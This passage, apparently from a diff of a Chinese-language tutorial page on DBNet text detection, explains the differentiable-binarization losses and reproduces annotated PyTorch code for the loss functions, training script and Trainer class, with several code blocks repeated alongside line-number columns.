      ​ DB 提高性能的原因可以通过梯度的反向传播来解释。以二元交叉熵损失为例。定义 $f(x)=\frac{1}{1+e^{-kx}}$ 作为我们的 DB 函数,其中 $x=P_{i,j}-T_{i,j}$。那么正标签的损失 $l_{+}$ 和负标签的损失 $l_{−}$ 分别为:

      @@ -581,17 +579,17 @@

      Optimization

      ​ $\alpha$ 和 $\beta$ 分别取 1.0 和 10。

      ​ 对 $L_s$ 和 $L_b$ 都应用了二进制交叉熵(BCE)损失:

      $$L_s=L_b=\Sigma_{i\in S_l}y_i\log x_i+(1-y_i)\log(1-x_i)$$

      -
      class BalanceCrossEntropyLoss(nn.Module):
      # 这个损失函数是交叉熵损失的一个平衡版本,用于处理类不平衡问题。它在计算损失时对正样本和负样本进行不同的加权,以便在训练时能更好地处理类别不平衡的情况。
      '''
      Balanced cross entropy loss.
      Shape:
      - Input: :math:`(N, 1, H, W)`
      - GT: :math:`(N, 1, H, W)`, same shape as the input
      - Mask: :math:`(N, H, W)`, same spatial shape as the input
      - Output: scalar.

      Examples::

      >>> m = nn.Sigmoid()
      >>> loss = nn.BCELoss()
      >>> input = torch.randn(3, requires_grad=True)
      >>> target = torch.empty(3).random_(2)
      >>> output = loss(m(input), target)
      >>> output.backward()
      '''

      def __init__(self, negative_ratio=3.0, eps=1e-6):
      # negative_ratio:一个负样本的比例,默认值为 3.0,表示负样本的数量是正样本数量的 3 倍。
      # eps: 一个小的常数(1e-6),用于避免除零错误。
      super(BalanceCrossEntropyLoss, self).__init__()
      self.negative_ratio = negative_ratio
      self.eps = eps

      def forward(self,
      pred: torch.Tensor, # pred: 网络的预测值,形状为 (N, 1, H, W)。
      gt: torch.Tensor, # 目标值,形状同 pred。
      mask: torch.Tensor, # 掩码,形状为 (N, H, W),用来指示正样本区域。
      return_origin=False):
      '''
      Args:
      pred: shape :math:`(N, 1, H, W)`, the prediction of network
      gt: shape :math:`(N, 1, H, W)`, the target
      mask: shape :math:`(N, H, W)`, the mask indicates positive regions
      '''
      # 计算正样本和负样本的数量,并使用负样本比例限制负样本的数量。
      positive = (gt * mask).byte()
      negative = ((1 - gt) * mask).byte()
      positive_count = int(positive.float().sum())
      negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
      loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
      # 计算每个位置的二进制交叉熵损失。
      positive_loss = loss * positive.float()
      negative_loss = loss * negative.float()
      # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
      # 对正样本和负样本分别计算损失,然后将负样本的损失限制为一定的数量。
      negative_loss, _ = negative_loss.view(-1).topk(negative_count)

      # 最终计算加权的总损失并返回。
      balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

      if return_origin:
      return balance_loss, loss
      return balance_loss
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      class BalanceCrossEntropyLoss(nn.Module):
      # 这个损失函数是交叉熵损失的一个平衡版本,用于处理类不平衡问题。它在计算损失时对正样本和负样本进行不同的加权,以便在训练时能更好地处理类别不平衡的情况。
      '''
      Balanced cross entropy loss.
      Shape:
      - Input: :math:`(N, 1, H, W)`
      - GT: :math:`(N, 1, H, W)`, same shape as the input
      - Mask: :math:`(N, H, W)`, same spatial shape as the input
      - Output: scalar.

      Examples::

      >>> m = nn.Sigmoid()
      >>> loss = nn.BCELoss()
      >>> input = torch.randn(3, requires_grad=True)
      >>> target = torch.empty(3).random_(2)
      >>> output = loss(m(input), target)
      >>> output.backward()
      '''

      def __init__(self, negative_ratio=3.0, eps=1e-6):
      # negative_ratio:一个负样本的比例,默认值为 3.0,表示负样本的数量是正样本数量的 3 倍。
      # eps: 一个小的常数(1e-6),用于避免除零错误。
      super(BalanceCrossEntropyLoss, self).__init__()
      self.negative_ratio = negative_ratio
      self.eps = eps

      def forward(self,
      pred: torch.Tensor, # pred: 网络的预测值,形状为 (N, 1, H, W)。
      gt: torch.Tensor, # 目标值,形状同 pred。
      mask: torch.Tensor, # 掩码,形状为 (N, H, W),用来指示正样本区域。
      return_origin=False):
      '''
      Args:
      pred: shape :math:`(N, 1, H, W)`, the prediction of network
      gt: shape :math:`(N, 1, H, W)`, the target
      mask: shape :math:`(N, H, W)`, the mask indicates positive regions
      '''
      # 计算正样本和负样本的数量,并使用负样本比例限制负样本的数量。
      positive = (gt * mask).byte()
      negative = ((1 - gt) * mask).byte()
      positive_count = int(positive.float().sum())
      negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
      loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
      # 计算每个位置的二进制交叉熵损失。
      positive_loss = loss * positive.float()
      negative_loss = loss * negative.float()
      # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
      # 对正样本和负样本分别计算损失,然后将负样本的损失限制为一定的数量。
      negative_loss, _ = negative_loss.view(-1).topk(negative_count)

      # 最终计算加权的总损失并返回。
      balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

      if return_origin:
      return balance_loss, loss
      return balance_loss

      ​ $L_t$ 被计算为扩展文本多边形 $G_d$ 内的预测和标签之间的 $L_1$ 距离之和:

      $$L_t=\Sigma_{i\in R_d}|y*_i-x*_i|$$

      -
      class MaskL1Loss(nn.Module):
      # 这是一个基于 L1 损失的变体,结合了掩码,仅在感兴趣的区域计算损失。
      def __init__(self, eps=1e-6):
      super(MaskL1Loss, self).__init__()
      self.eps = eps

      def forward(self, pred: torch.Tensor, gt, mask):
      # 计算预测值和真实值之间的绝对差异,并根据掩码计算加权和。
      loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
      return loss
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      class MaskL1Loss(nn.Module):
      # 这是一个基于 L1 损失的变体,结合了掩码,仅在感兴趣的区域计算损失。
      def __init__(self, eps=1e-6):
      super(MaskL1Loss, self).__init__()
      self.eps = eps

      def forward(self, pred: torch.Tensor, gt, mask):
      # 计算预测值和真实值之间的绝对差异,并根据掩码计算加权和。
      loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
      return loss

      ​ 在推理阶段,我们可以使用概率图或近似二进制图来生成文本边界框,这会产生几乎相同的结果。

      $$D’=\frac{A’\times r’}{L’}$$

      ​ 其中 $A’$ 是收缩多边形的面积;$L’$ 是收缩多边形的周长;$r’$ 根据经验设定为 1.5。

      DB_loss.py

      -
      from torch import nn

      from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


      class DBLoss(nn.Module):
      def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
      """
      Implement PSE Loss.
      :param alpha: binary_map loss 前面的系数
      :param beta: threshold_map loss 前面的系数
      :param ohem_ratio: OHEM 的比例
      :param reduction: 'mean' or 'sum'对 batch 里的 loss 算均值或求和
      """
      super().__init__()
      assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
      # alpha 和 beta 是控制不同损失项权重的系数。
      self.alpha = alpha
      self.beta = beta
      self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
      self.dice_loss = DiceLoss(eps=eps)
      self.l1_loss = MaskL1Loss(eps=eps)
      self.ohem_ratio = ohem_ratio # 用于 OHEM(在线困难样本挖掘)的比例。
      self.reduction = reduction # 指定了损失的归约方式(均值或总和)。

      def forward(self, pred, batch):
      shrink_maps = pred[:, 0, :, :]
      threshold_maps = pred[:, 1, :, :]
      binary_maps = pred[:, 2, :, :]

      loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask']) # 对 shrink_maps 使用交叉熵损失(OHEM)。
      loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask']) # 对 threshold_maps 使用 L1 损失。
      metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps) # 如果 pred 包含多于两个通道,还计算 binary_maps 的 Dice 损失。
      if pred.size()[1] > 2:
      loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
      metrics['loss_binary_maps'] = loss_binary_maps
      loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps # 汇总各个损失项,并根据是否包含 binary_maps 来调整总损失 (loss_all)。
      metrics['loss'] = loss_all # 返回一个包含各个损失项和总损失的字典 metrics。
      else:
      metrics['loss'] = loss_shrink_maps
      return metrics
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      from torch import nn

      from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


      class DBLoss(nn.Module):
      def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
      """
      Implement PSE Loss.
      :param alpha: binary_map loss 前面的系数
      :param beta: threshold_map loss 前面的系数
      :param ohem_ratio: OHEM 的比例
      :param reduction: 'mean' or 'sum'对 batch 里的 loss 算均值或求和
      """
      super().__init__()
      assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
      # alpha 和 beta 是控制不同损失项权重的系数。
      self.alpha = alpha
      self.beta = beta
      self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
      self.dice_loss = DiceLoss(eps=eps)
      self.l1_loss = MaskL1Loss(eps=eps)
      self.ohem_ratio = ohem_ratio # 用于 OHEM(在线困难样本挖掘)的比例。
      self.reduction = reduction # 指定了损失的归约方式(均值或总和)。

      def forward(self, pred, batch):
      shrink_maps = pred[:, 0, :, :]
      threshold_maps = pred[:, 1, :, :]
      binary_maps = pred[:, 2, :, :]

      loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask']) # 对 shrink_maps 使用交叉熵损失(OHEM)。
      loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask']) # 对 threshold_maps 使用 L1 损失。
      metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps) # 如果 pred 包含多于两个通道,还计算 binary_maps 的 Dice 损失。
      if pred.size()[1] > 2:
      loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
      metrics['loss_binary_maps'] = loss_binary_maps
      loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps # 汇总各个损失项,并根据是否包含 binary_maps 来调整总损失 (loss_all)。
      metrics['loss'] = loss_all # 返回一个包含各个损失项和总损失的字典 metrics。
      else:
      metrics['loss'] = loss_shrink_maps
      return metrics

      Experiments

      -
      from __future__ import print_function

      import argparse
      import os

      import anyconfig


      def init_args():
      parser = argparse.ArgumentParser(description='DBNet.pytorch')
      parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
      parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

      args = parser.parse_args()
      return args


      def main(config):
      # 导入必要的模块,包括模型构建、损失函数、数据加载器、训练器、后处理和评估指标。
      import torch
      from models import build_model, build_loss
      from data_loader import get_dataloader
      from trainer import Trainer
      from post_processing import get_post_processing
      from utils import get_metric
      # 检查是否有多个 GPU,如果有,则初始化分布式训练环境。
      if torch.cuda.device_count() > 1:
      torch.cuda.set_device(args.local_rank)
      torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
      config['distributed'] = True
      else:
      config['distributed'] = False
      config['local_rank'] = args.local_rank

      # 根据配置文件加载训练和验证数据加载器。
      train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
      assert train_loader is not None
      if 'validate' in config['dataset']:
      validate_loader = get_dataloader(config['dataset']['validate'], False)
      else:
      validate_loader = None

      # 构建损失函数并将其移动到 GPU。
      criterion = build_loss(config['loss']).cuda()

      # 配置模型的输入通道数(彩色图像为 3 通道,灰度图像为 1 通道)。
      config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
      model = build_model(config['arch'])

      # 构建模型、后处理函数和评估指标。
      post_p = get_post_processing(config['post_processing'])
      metric = get_metric(config['metric'])

      # 创建 Trainer 对象并开始训练。
      trainer = Trainer(config=config,
      model=model,
      criterion=criterion,
      train_loader=train_loader,
      post_process=post_p,
      metric_cls=metric,
      validate_loader=validate_loader)
      trainer.train()


      if __name__ == '__main__':
      # 处理模块路径,确保当前目录和上级目录在 Python 路径中。
      import sys
      import pathlib
      __dir__ = pathlib.Path(os.path.abspath(__file__))
      sys.path.append(str(__dir__))
      sys.path.append(str(__dir__.parent.parent))
      # project = 'DBNet.pytorch' # 工作项目根目录
      # sys.path.append(os.getcwd().split(project)[0] + project)

      # 使用 anyconfig 读取配置文件,并解析基础配置。
      from utils import parse_config

      args = init_args()
      assert os.path.exists(args.config_file)
      config = anyconfig.load(open(args.config_file, 'rb'))
      if 'base' in config:
      config = parse_config(config)
      # 调用 main 函数开始模型训练。
      main(config)
      import time

      import torch
      import torchvision.utils as vutils
      from tqdm import tqdm

      from base import BaseTrainer
      from utils import WarmupPolyLR, runningScore, cal_text_score


      class Trainer(BaseTrainer):
      # 初始化:__init__ 方法接受多个参数,包括配置 (config)、模型 (model)、损失函数 (criterion)、训练和验证数据加载器 (train_loader 和 validate_loader)、评估指标类 (metric_cls)、以及可选的后处理函数 (post_process)。
      def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
      super(Trainer, self).__init__(config, model, criterion)
      # 参数设置:从配置中读取训练迭代次数 (show_images_iter),并初始化训练和验证数据加载器。若验证数据加载器存在,确保提供了后处理函数和评估指标类。
      self.show_images_iter = self.config['trainer']['show_images_iter']
      self.train_loader = train_loader
      if validate_loader is not None:
      assert post_process is not None and metric_cls is not None
      self.validate_loader = validate_loader
      self.post_process = post_process
      self.metric_cls = metric_cls
      self.train_loader_len = len(train_loader)
      # 学习率调度器:根据配置,设置学习率调度器 WarmupPolyLR,用于调整学习率。它支持学习率的预热和多项式衰减。
      if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
      warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
      if self.start_epoch > 1:
      self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
      self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
      warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
      # 日志记录:记录训练和验证数据集的样本数量和数据加载器的数量。
      if self.validate_loader is not None:
      self.logger_info(
      'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
      len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
      else:
      self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

      # 这段代码定义了 _train_epoch 方法,用于训练模型一个训练周期(epoch)。
      def _train_epoch(self, epoch):
      # 模型训练模式:调用 self.model.train() 设置模型为训练模式。
      self.model.train()
      # 时间记录:记录周期和批次的开始时间。
      epoch_start = time.time()
      batch_start = time.time()
      train_loss = 0.
      running_metric_text = runningScore(2)
      # 初始化:初始化累计损失 train_loss 和运行中的指标 running_metric_text,并获取当前学习率 lr。
      lr = self.optimizer.param_groups[0]['lr']

      # 遍历数据:遍历训练数据加载器中的每个批次:
      for i, batch in enumerate(self.train_loader):
      if i >= self.train_loader_len:
      break
      self.global_step += 1
      lr = self.optimizer.param_groups[0]['lr']

      # 数据进行转换和丢到 gpu
      # 将数据移动到 GPU 上。
      for key, value in batch.items():
      if value is not None:
      if isinstance(value, torch.Tensor):
      batch[key] = value.to(self.device)
      cur_batch_size = batch['img'].size()[0]

      # 通过模型生成预测 preds。
      preds = self.model(batch['img'])
      # 计算损失 loss_dict,并执行反向传播和优化步骤。
      loss_dict = self.criterion(preds, batch)
      # backward
      self.optimizer.zero_grad()
      loss_dict['loss'].backward()
      self.optimizer.step()
      # 如果使用了 WarmupPolyLR,更新学习率调度器。
      if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
      self.scheduler.step()
      # acc iou
      # 计算指标 score_shrink_map,并记录损失和准确度信息。
      score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
      thred=self.config['post_processing']['args']['thresh'])

      # loss 和 acc 记录到日志
      # 日志记录:将损失和各个指标记录为字符串 loss_str,并累加到总训练损失 train_loss。
      loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
      for idx, (key, value) in enumerate(loss_dict.items()):
      loss_dict[key] = value.item()
      if key == 'loss':
      continue
      loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
      if idx < len(loss_dict) - 1:
      loss_str += ', '

      train_loss += loss_dict['loss']
      acc = score_shrink_map['Mean Acc']
      iou_shrink_map = score_shrink_map['Mean IoU']

      # 条件:每隔 log_iter 步记录一次日志。
      # 指标:计算每秒处理样本的速度,并记录准确率、IoU、损失和学习率。
      # 日志记录:使用 self.logger_info 输出这些指标,以便监控训练过程。
      if self.global_step % self.log_iter == 0:
      batch_time = time.time() - batch_start
      self.logger_info(
      '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
      epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
      iou_shrink_map, loss_str, lr, batch_time))
      batch_start = time.time()

      # 条件:如果启用了 TensorBoard,则写入日志。
      # 损失和指标:将各种训练指标和损失记录到 TensorBoard 中以便可视化。
      if self.tensorboard_enable and self.config['local_rank'] == 0:
      # write tensorboard
      for key, value in loss_dict.items():
      self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
      self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
      self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
      self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
      # 图像可视化:条件:每隔 show_images_iter 步可视化一次图像。
      # 图像和标签:将原始图像、真实标签和模型预测结果添加到 TensorBoard 中。
      # 可视化:使用 vutils.make_grid 创建图像网格以便更好地可视化。
      if self.global_step % self.show_images_iter == 0:
      # show images on tensorboard
      self.inverse_normalize(batch['img'])
      self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
      # shrink_labels and threshold_labels
      shrink_labels = batch['shrink_map']
      threshold_labels = batch['threshold_map']
      shrink_labels[shrink_labels <= 0.5] = 0
      shrink_labels[shrink_labels > 0.5] = 1
      show_label = torch.cat([shrink_labels, threshold_labels])
      show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
      self.writer.add_image('TRAIN/gt', show_label, self.global_step)
      # model output
      show_pred = []
      for kk in range(preds.shape[1]):
      show_pred.append(preds[:, kk, :, :])
      show_pred = torch.cat(show_pred)
      show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
      self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
      # 总结:返回一个包含每个 epoch 的平均训练损失、学习率、总时间和 epoch 编号的字典。
      return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
      'epoch': epoch}

      def _eval(self, epoch):
      # 这将影响模型的行为,比如在评估时关闭 dropout 和 batch normalization。
      self.model.eval()
      # torch.cuda.empty_cache() # speed up evaluating after training finished
      # raw_metrics 用来存储每个批次的评估指标,total_frame 用来记录总的处理帧数,total_time 记录总的处理时间。
      raw_metrics = []
      total_frame = 0.0
      total_time = 0.0
      for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
      # 关闭梯度计算:这用于避免计算梯度,从而减少内存使用和加快计算速度。
      with torch.no_grad():
      # 数据进行转换和丢到gpu
      for key, value in batch.items():
      if value is not None:
      if isinstance(value, torch.Tensor):
      batch[key] = value.to(self.device)
      # 记录开始时间并进行预测:
      start = time.time()
      preds = self.model(batch['img'])
      # 对预测结果进行后处理:
      boxes, scores = self.post_process(batch, preds,is_output_polygon=self.metric_cls.is_output_polygon)
      # 更新统计数据:
      total_frame += batch['img'].size()[0]
      total_time += time.time() - start
      # 计算并记录评估指标:
      raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
      raw_metrics.append(raw_metric)
      # 汇总指标:
      metrics = self.metric_cls.gather_measure(raw_metrics)
      # 记录每秒帧数(FPS):
      self.logger_info('FPS:{}'.format(total_frame / total_time))
      # 返回指标:
      return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

      def _on_epoch_finish(self):
      # 这个方法在每个训练周期结束时执行,执行以下操作:
      # 记录当前训练周期的信息:
      self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
      self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
      self.epoch_result['lr']))
      # 保存模型检查点:
      net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
      net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

      # 如果是主进程:
      if self.config['local_rank'] == 0:
      # 保存当前模型检查点:
      self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
      save_best = False
      if self.validate_loader is not None and self.metric_cls is not None: # 使用 f1 作为最优模型指标
      # 评估模型性能(如果有验证集和指标类):
      recall, precision, hmean = self._eval(self.epoch_result['epoch'])

      # 记录评估指标到 TensorBoard(如果启用):
      if self.tensorboard_enable:
      self.writer.add_scalar('EVAL/recall', recall, self.global_step)
      self.writer.add_scalar('EVAL/precision', precision, self.global_step)
      self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
      self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

      # 根据 F1 分数或训练损失判断是否保存最佳模型:
      if hmean >= self.metrics['hmean']:
      save_best = True
      self.metrics['train_loss'] = self.epoch_result['train_loss']
      self.metrics['hmean'] = hmean
      self.metrics['precision'] = precision
      self.metrics['recall'] = recall
      self.metrics['best_model_epoch'] = self.epoch_result['epoch']
      else:
      if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
      save_best = True
      self.metrics['train_loss'] = self.epoch_result['train_loss']
      self.metrics['best_model_epoch'] = self.epoch_result['epoch']
      # 记录最佳模型的信息并保存最佳模型:
      best_str = 'current best, '
      for k, v in self.metrics.items():
      best_str += '{}: {:.6f}, '.format(k, v)
      self.logger_info(best_str)
      if save_best:
      import shutil
      shutil.copy(net_save_path, net_save_path_best)
      self.logger_info("Saving current best: {}".format(net_save_path_best))
      else:
      self.logger_info("Saving checkpoint: {}".format(net_save_path))


      def _on_train_finish(self):
      # 这个方法在训练完成时执行,执行以下操作:
      # 记录所有指标信息:
      for k, v in self.metrics.items():
      self.logger_info('{}:{}'.format(k, v))
      # 记录训练完成的信息:
      self.logger_info('finish train')
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      from __future__ import print_function

      import argparse
      import os

      import anyconfig


      def init_args():
      parser = argparse.ArgumentParser(description='DBNet.pytorch')
      parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
      parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

      args = parser.parse_args()
      return args


      def main(config):
      # 导入必要的模块,包括模型构建、损失函数、数据加载器、训练器、后处理和评估指标。
      import torch
      from models import build_model, build_loss
      from data_loader import get_dataloader
      from trainer import Trainer
      from post_processing import get_post_processing
      from utils import get_metric
      # 检查是否有多个 GPU,如果有,则初始化分布式训练环境。
      if torch.cuda.device_count() > 1:
      torch.cuda.set_device(args.local_rank)
      torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
      config['distributed'] = True
      else:
      config['distributed'] = False
      config['local_rank'] = args.local_rank

      # 根据配置文件加载训练和验证数据加载器。
      train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
      assert train_loader is not None
      if 'validate' in config['dataset']:
      validate_loader = get_dataloader(config['dataset']['validate'], False)
      else:
      validate_loader = None

      # 构建损失函数并将其移动到 GPU。
      criterion = build_loss(config['loss']).cuda()

      # 配置模型的输入通道数(彩色图像为 3 通道,灰度图像为 1 通道)。
      config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
      model = build_model(config['arch'])

      # 构建模型、后处理函数和评估指标。
      post_p = get_post_processing(config['post_processing'])
      metric = get_metric(config['metric'])

      # 创建 Trainer 对象并开始训练。
      trainer = Trainer(config=config,
      model=model,
      criterion=criterion,
      train_loader=train_loader,
      post_process=post_p,
      metric_cls=metric,
      validate_loader=validate_loader)
      trainer.train()


      if __name__ == '__main__':
      # 处理模块路径,确保当前目录和上级目录在 Python 路径中。
      import sys
      import pathlib
      __dir__ = pathlib.Path(os.path.abspath(__file__))
      sys.path.append(str(__dir__))
      sys.path.append(str(__dir__.parent.parent))
      # project = 'DBNet.pytorch' # 工作项目根目录
      # sys.path.append(os.getcwd().split(project)[0] + project)

      # 使用 anyconfig 读取配置文件,并解析基础配置。
      from utils import parse_config

      args = init_args()
      assert os.path.exists(args.config_file)
      config = anyconfig.load(open(args.config_file, 'rb'))
      if 'base' in config:
      config = parse_config(config)
      # 调用 main 函数开始模型训练。
      main(config)
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      85
      86
      87
      88
      89
      90
      91
      92
      93
      94
      95
      96
      97
      98
      99
      100
      101
      102
      103
      104
      105
      106
      107
      108
      109
      110
      111
      112
      113
      114
      115
      116
      117
      118
      119
      120
      121
      122
      123
      124
      125
      126
      127
      128
      129
      130
      131
      132
      133
      134
      135
      136
      137
      138
      139
      140
      141
      142
      143
      144
      145
      146
      147
      148
      149
      150
      151
      152
      153
      154
      155
      156
      157
      158
      159
      160
      161
      162
      163
      164
      165
      166
      167
      168
      169
      170
      171
      172
      173
      174
      175
      176
      177
      178
      179
      180
      181
      182
      183
      184
      185
      186
      187
      188
      189
      190
      191
      192
      193
      194
      195
      196
      197
      198
      199
      200
      201
      202
      203
      204
      205
      206
      207
      208
      209
      210
      211
      212
      213
      214
      215
      216
      217
      218
      219
      220
      221
      222
      223
      224
      225
      226
      227
      228
      229
      230
      231
      232
      233
      234
      235
      import time

      import torch
      import torchvision.utils as vutils
      from tqdm import tqdm

      from base import BaseTrainer
      from utils import WarmupPolyLR, runningScore, cal_text_score


      class Trainer(BaseTrainer):
      # 初始化:__init__ 方法接受多个参数,包括配置 (config)、模型 (model)、损失函数 (criterion)、训练和验证数据加载器 (train_loader 和 validate_loader)、评估指标类 (metric_cls)、以及可选的后处理函数 (post_process)。
      def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
      super(Trainer, self).__init__(config, model, criterion)
      # 参数设置:从配置中读取训练迭代次数 (show_images_iter),并初始化训练和验证数据加载器。若验证数据加载器存在,确保提供了后处理函数和评估指标类。
      self.show_images_iter = self.config['trainer']['show_images_iter']
      self.train_loader = train_loader
      if validate_loader is not None:
      assert post_process is not None and metric_cls is not None
      self.validate_loader = validate_loader
      self.post_process = post_process
      self.metric_cls = metric_cls
      self.train_loader_len = len(train_loader)
      # 学习率调度器:根据配置,设置学习率调度器 WarmupPolyLR,用于调整学习率。它支持学习率的预热和多项式衰减。
      if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
      warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
      if self.start_epoch > 1:
      self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
      self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
      warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
      # 日志记录:记录训练和验证数据集的样本数量和数据加载器的数量。
      if self.validate_loader is not None:
      self.logger_info(
      'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
      len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
      else:
      self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

